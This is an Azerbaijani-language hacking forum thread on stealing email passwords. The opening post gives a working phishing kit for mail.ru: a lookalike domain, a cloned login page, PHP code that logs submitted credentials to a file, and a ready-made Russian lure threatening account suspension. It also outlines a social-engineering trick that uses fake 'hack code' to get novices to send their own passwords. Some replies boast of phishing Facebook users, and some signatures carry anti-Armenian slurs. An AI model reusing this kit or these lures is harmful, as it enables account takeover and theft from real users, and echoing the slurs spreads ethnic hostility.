Anti-armenia.ORG - Forumlar - E-Mail hack yolları



Istifadəçi
    2014-10-27 08:47 GMT                 

StealtH



Security
Mesaj Sayı : 839
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   25  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər : Sumqayıt
Ölkə :
Məslək : Pan - Turkism
Yaş : 34
Mesaj :

Mövzunu Paylaş!


Çox saylı muraciətləri nəzərə alaraq bu mövzu haqqında bilgilərimlə istərdim ki, sizlərlə paylaşım

Indiki zamanda e-mail hack demək olar ki, aktuallığını itirmir
Mövzü aktual olana kimi onun müxtəlif həll yollarıda olacaq
Asağıda mən ən aktual yollar haqqında danışacam

1) Malware
Yəni hər hansısa troyan vasitəsilə e-mail şifrəsinin ogurlanması
Bunun üçün ən çox istifadə olunan troyan növləri bunlardır

stealer - brauzerdə və yaxud e-mail klient proqramlarında saxlanılmış şifrələri "oğurlayır"

keylogger - klavişdə daxil edilən məlumatları və bufer-dəki məlumatları oğurlayır

form grabber - pc-də oturandan sonra userın web səhifələrdə və soft larda daxıl etdiyi məlumatları (login , şifrə və s.) oğurlayır.
Bu cür troyan tipi indi ən aktualdır , ona görə ki o ancaq yaddasda saxlanılmış şifrələri deyil həmdə user tərəfindən əl ilə hər dəfə daxil edilən şifrələri də ogurlayır.
Bir nov keylogger kimi ancaq onu keyloggerdən üstün edən cəhhəti odur ki, o lazımsız klavişdən gələn məlumatları oğurlamır ancaq form-a daxil edilən məlumatları. bu na görə

bu cur troyanlar public-də demək olar ki mövcud deyil

2)Bruteforce

Bu növ haqq hamıya məlum olan və o qədər də effektiv olmayan hack üsüludur
Bu haqda uzun danışmayacam sadəcə qısa olaraq deyim ki bu proqram qabaqcadan hazırlanmış şıfrə variantlarını bir-bir yoxlayır
bu cür hack şifələrini 123123 qwerty kimi qoyan userləri hacklamaq üçün nəzərdə tutulur
Onun effektivliyini azaldan bir səbəbdə odur ki, müasir zamanda bütün mail servislərində brut əleyhinə müdafiə sistemləri olur

3) Phishing (https://en.wikipedia.org/wiki/Phishing)

Bu üsül müasir zamanda ən aktual e-mail hack üsüludur
Bu üsülla təkcə e-mail şifrələrni deyil müxtəlif bankların userlərinin kredit kart məlumatlarının oğurlanması üçün geniş istifadə edilir
Yuxarıdakı üslullardan fərqli olaraq bu üsül hər hansısa bir qabaqcadan nəzərdə tutulmuş userin məlumatlarının oğurlanması üçün istifadə olunur (yuxarıda qeyd edilən üsullar

hər hansısa bir userin deyil loru dildə desək "kim düşdü düşdü" onun maəlumatlarını oğurlamaq üçün nəzərdə tutulur)
Bu üsül haqqındada uzun danışmayacağam.
Misal üçün biz mail.ru -da yerləşən userin mailini oğurlamağa çalışaq (test@mail.ru)
Bizə mail.ru a oxşayan bir domain (misal üçün mail-login.ru) və bu domain yerləşdirmək üçün hostig lazımdır
Domain və hosting alandan sonra domain üçün e subdomain-i açırıq yəni e.mail-login.ru
Sonra bizə mail.ru-nun html səhifəsi lazimdır
Onu burdan götürürük https://e.mail.ru/login
Səhifəni index.php kimi save edirik , sonra notepad vasitəsilə faylın html kodunu açırıq
Kodda bu kodu axtarış veririk <form id="LoginExternal" method="post" action="https://auth.mail.ru/cgi-bin/auth" name="Auth">
Oradakı https://auth.mail.ru/cgi-bin/auth userin daxil elədiyi login və şifrənin hara göndəriləcəyi ünvandır
Daxil olunan məlumatlar həmin ünvana göndərilir və orda yoxlanılır , əgər daxil edilən məlumatlar düzdürsə user öz e-mail-nə yönəldilir
Biz bu ünvanı log.php-yə dəyişirik <form id="LoginExternal" method="post" action="log.php" name="Auth">
index.php save edirik
Sonra biz log.php faylı yaradırıq və ora bu kodu əlavə edirik

Kod:
<?PHP
$Login = $_POST['Login'];
$Password = $_POST['Password'];
$Domain = $_POST['Domain'];
$log = fopen("log.txt","a+");
fwrite($log,"\n Email:$Login@$Domain  Sifre:$Password \n");
fclose($log);
header ("https://e.mail.ru/messages/inbox");
?>


user log və passı daxil edib enteri bassa log və pass siz öz saytıvızda yerləşdirəcəyiviz log.php e gedecek
bu scriptdə log və passı serverdəki log.txt falına yazıb useri
https://e.mail.ru/messages/inbox saytına redirect edecek
index.phplog.php fayllarını aldığımız hostingə public_html qovluğuna upload edirik və hər iki fayla 777 hüququ veririk
bizim fayl http://e.mail-login.ru/index.php ünvanında yerləşəcək

Sonra biz userin e-mail-nə göndərəcəyimiz "fake" adlanan html formasında məktub tərtib edməliyik

Kod:
Ваш профиль будет заблокирован, в связи с жалобой поступившей к администрации 27.10.2014. <br><br>
Согласно пункту 13.3 пользовательского соглашения, Mail.Ru оставляет за собой право временно приостановить либо прекратить предоставление услуг Mail.Ru,

своевременно уведомив об этом пользователя.<br><br>
Для того чтобы опровергнуть заявление Вам нужно подтвердить что вы не являетесь спам ботом. <br><br>
Для подтверждение пройдите по ссылке: <a

href="http://e.mail-login.ru/index.php?spam?unblocked=2008474861215660">http://e.mail.ru/index.php?spam?unblocked=2008474861215660</a><br><br>
Если заявка не будет отклонена в течении 2 дней, ваш почтовый аккуант будет заблокирован. Ей присвоен номер 2008474861215660.
сылке: <a

href="http://e.mail-login.ru/index.php?spam?unblocked=2008474861215660">http://e.mail.ru/index.php?spam?unblocked=2008474861215660</a><br><br>
Если заявка не будет отклонена в течении 2 дней, ваш почтовый аккуант будет заблокирован. Ей присвоен номер 2008474861215660.[/code]

Məktubda yazılıb ki guya user-in e-maildən mail.ru adminlərinə şikayət gəlib spam göndərdiyinə görə və user gərək ki, sübut etsin ki o spam bot yox insandır
ona görə yerləşdirlimiş linkə keçid etsin
Məktubda link http://e.mail.ru/index.php?spam?unblocked=2008474861215660 kimi görsənir
http://i072.radikal.ru/1410/1b/c2add50c9d8c.jpg

amma əslimdə link http://e.mail-login.ru/index.php?spam?unblocked=2008474861215660 dir (yuxarıdakı index.php-nin yerləşdiyi ünvan)
Bu məktubu html formatında php script vasitəsilə göndəririk userin -mail-nə ( php sender -> https://anti-armenia.org/forums.php?m=posts&q=2108 )
Və gözləyik ki, user məktubu açsın və link-ə keçid edərək log və passını daxil etsin


Yuxarıda qey etdiyim üsüllardan əlavə bir üsülda var ki, ona SM yəni sosial mühəndislik deyilir
İndi bu üsül o qədər də aktual deyil amma 6-8 il bunda qabaq runetdə ən geniş yayılan üsul aşağıdakı idi
biz mail.ru nun admin e-mail-ə oxşayan bir e-mail açırıq misal üçün admin-servis@mail.ru
sonra lamerlər üçün nəzərdə tutulan hack forumlarında belə bir elan yerləşdiririk
"Mən mail-da istənilən insanın mailinin şifrəsini restore etməyin yolunu öyrənmişəm
Mail.ru-nun serverində restore bölməsindəki bug vasitəsilə istənilən e-mailin şifrəsini öyrənmək olar
bunu üçün bizə bu kod lazımdır


[code]Read in the strings.
my $restore_account = "lazımolanmail@mail.ru";
my $sender = "mənimmailin@mail.ru";
my $password = "şifrə";
while(my $line = <STDIN>) {
chomp $line;
if($line eq "STOP!") { last; }
$accum = "$accum$sep$line";
if(--$num == 0) { last; }
$sep = " ";
}[/code]

bu kodda lazımolanmail@mail.ru yerinə sındırmaq lazım olan mail qeyd edirik
mənimmailin@mail.ru bu bölməyə kodu göndərdiyiviz və şifrənin hara göndəriləcəyi mail-i qeyd edirik
şifrə: bura həmin mailin şifərini qey edirik , bu bizə authorized üçün lazımdır
Kodu göndəririk admin-servis@mail.ru mailinə və bir neçə dəqiqədən sonra mailə şifrə göndərilir"

Bunulada lamer özü öz şifrəsini bizə yollayır ))))
Əslində bu kod perl control constructs kodunda bir hissə dir amma lamer üçün bu bir dəhşətli hack kodudur))

Yuxarıda qeyd edilmiş üsüllar ancaq informasiya məqsədi ilə yazılmışdır
Kimə sə yetirilmiş ziyana görə mən cavabdehlik daşımıram

Bura Ergenekon, təpədən-dırnağa Türkəm!

http://s41.radikal.ru/i092/1308/a7/c6e81f41523b.png
Anti-armenia.ORG
    

Istifadəçi
    2014-10-27 10:53 GMT                 

Cahangir25



Informatix
Mesaj Sayı : 1142
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   91  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər : PHP
Ölkə :
Məslək : Front-end Web Developer
Yaş :
Mesaj :

Mövzunu Paylaş!


Teshekkürler Ela Movzudu...
Phishing en qisa ve en effektisidir... Onu oz free hostuma atmisham... Amma tekce fb ucundur...
Insallah inkishaf etdirib pylashacam...

AZERBAIJAN!!! FUCK armenia!!!
Anti-armenia.ORG
    

Istifadəçi
    2014-10-27 11:46 GMT                 

WolF_AlphA



İstifadəçi
Mesaj Sayı : 9
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   0  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər :
Ölkə :
Məslək : WolF_AlphA
Yaş :
Mesaj :

Mövzunu Paylaş!


video VAr Qardaw?

Anti-armenia.ORG
    

Istifadəçi
    2014-10-27 16:05 GMT                 

StealtH



Security
Mesaj Sayı : 839
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   25  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər : Sumqayıt
Ölkə :
Məslək : Pan - Turkism
Yaş : 34
Mesaj :

Mövzunu Paylaş!


Sitat
#43488 WolF_AlphA :
video VAr Qardaw?

nəyin videosu ?
mən bu mövzuda sadəcə olaraq üstən toxunmuşam , mən yazmadım ki, video ilə fake düzəltməyi öyrədəcən
onu deyə bilərəm ki phishinglə məşqul olmaq üçün ən azından domain almaq hosting almaq domain name serverlərini dəyişmək və htmk php -dən bir azca da olsa xəbərdar olmaq lazımdır

Bura Ergenekon, təpədən-dırnağa Türkəm!

http://s41.radikal.ru/i092/1308/a7/c6e81f41523b.png
Anti-armenia.ORG
    

Istifadəçi
    2014-10-27 19:29 GMT                 

0rkh4n



Designer
Mesaj Sayı : 1007
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   109  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər : Baki
Ölkə :
Məslək : 💻
Yaş :
Mesaj :

Mövzunu Paylaş!


Təşəkkürlər

LIVE FREE OR DIE
Anti-armenia.ORG
    

Istifadəçi
    2014-10-27 21:28 GMT                 

bill



İstifadəçi
Mesaj Sayı : 269
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   0  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər :
Ölkə :
Məslək : bill
Yaş :
Mesaj :

Mövzunu Paylaş!


mailbrut

Anti-armenia.ORG
    

Istifadəçi
    2014-10-28 19:42 GMT                 

SHi3LD



Gold
Mesaj Sayı : 723
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   93  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər :
Ölkə :
Məslək :
Yaş :
Mesaj :

Mövzunu Paylaş!


Əla təşşəkkürlər

Anti-armenia.ORG
    

Istifadəçi
    2014-10-28 19:54 GMT                 

Gasimoff



İstifadəçi
Mesaj Sayı : 140
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   4  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər : Gəncə
Ölkə :
Məslək : Enigneer
Yaş : 105
Mesaj :

Mövzunu Paylaş!


təsəkkürlər əla mövzudur

BİR MİLLƏT İKİ DÖVLƏT TÜRK OĞLU TÜRK BİZİK
Anti-armenia.ORG
    

Istifadəçi
    2014-10-30 21:52 GMT                 

HVen



İstifadəçi
Mesaj Sayı : 37
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   0  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər :
Ölkə :
Məslək : HVen
Yaş :
Mesaj :

Mövzunu Paylaş!


təşəkkürlər ən çox istifadə elədiyim bruter birdə fakerdir esasən facebook üçün )) bəzəndə səyfə açıram yazıram security yada facebook team qurbanmada diyirəmki profil sındırmagı öyrədim gir ora emailini parolunu birdə sındırmaq istədiyin adamın linkini at) 1 dəfə yoxlamışam o da alınıb))

Anti-armenia.ORG
    

Istifadəçi
    2014-11-01 22:06 GMT                 

BlackMinD



Pr0grammer
Mesaj Sayı : 1677
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   62  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər : KARABAKH IS AZERBAIJAN!
Ölkə :
Məslək :
Yaş :
Mesaj :

Mövzunu Paylaş!


Əməyə Hörmət bro Çox sağol

Ana VƏTƏN!
Anti-armenia.ORG
    

Istifadəçi
    2014-11-02 07:31 GMT                 

StealtH



Security
Mesaj Sayı : 839
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   25  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər : Sumqayıt
Ölkə :
Məslək : Pan - Turkism
Yaş : 34
Mesaj :

Mövzunu Paylaş!


Dəyməz. Buyurun )

Bura Ergenekon, təpədən-dırnağa Türkəm!

http://s41.radikal.ru/i092/1308/a7/c6e81f41523b.png
Anti-armenia.ORG
    

Istifadəçi
    2016-06-21 14:49 GMT                 

Mert Bolat



İstifadəçi
Mesaj Sayı : 7
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   0  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər :
Ölkə :
Məslək :
Yaş :
Mesaj :

Mövzunu Paylaş!


eline sağlık

Anti-armenia.ORG
    

Istifadəçi
    2016-07-05 23:05 GMT                 

hacker-by qasimov



Banned
Mesaj Sayı : 17
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   0  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər :
Ölkə :
Məslək :
Yaş : 23
Mesaj :

Mövzunu Paylaş!


Pay ALLAHA and oslun Kəlləsize Kəllə AZƏRBAYCANIN belə Oğulları Olandan sonra Ph AZƏRBAYCAN bas qaza Əməyə HÖRMƏT 1+ və Çoooox sağol "BRO"

Anti-armenia.ORG
    

Istifadəçi
    2016-11-08 13:41 GMT                 

nexon



İstifadəçi
Mesaj Sayı : 4
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   0  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər :
Ölkə :
Məslək :
Yaş :
Mesaj :

Mövzunu Paylaş!


bəs Instagram hackleməyi basa salarsan

Anti-armenia.ORG
    

Istifadəçi
    2017-01-20 12:02 GMT                 

soli99



İstifadəçi
Mesaj Sayı : 9
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   0  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər : zaqatala
Ölkə :
Məslək : cyber securty
Yaş : 33
Mesaj :

Mövzunu Paylaş!


Teshekkürler Ela

Soli99
Anti-armenia.ORG
    

Istifadəçi
    2017-02-04 09:03 GMT                 

Mr.UNKO4N



Gold
Mesaj Sayı : 336
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   26  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər : Baku
Ölkə :
Məslək : Kompyuter Mühəndisi
Yaş : 7
Mesaj :

Mövzunu Paylaş!


Sənin Dediyin Punish Ülu Qısaca Oltalamağ lamer tutmağ kimidə deməy olar)))) əla mövzüdü!

http://s019.radikal.ru/i625/1712/e2/efbfd92b899c.png
Anti-armenia.ORG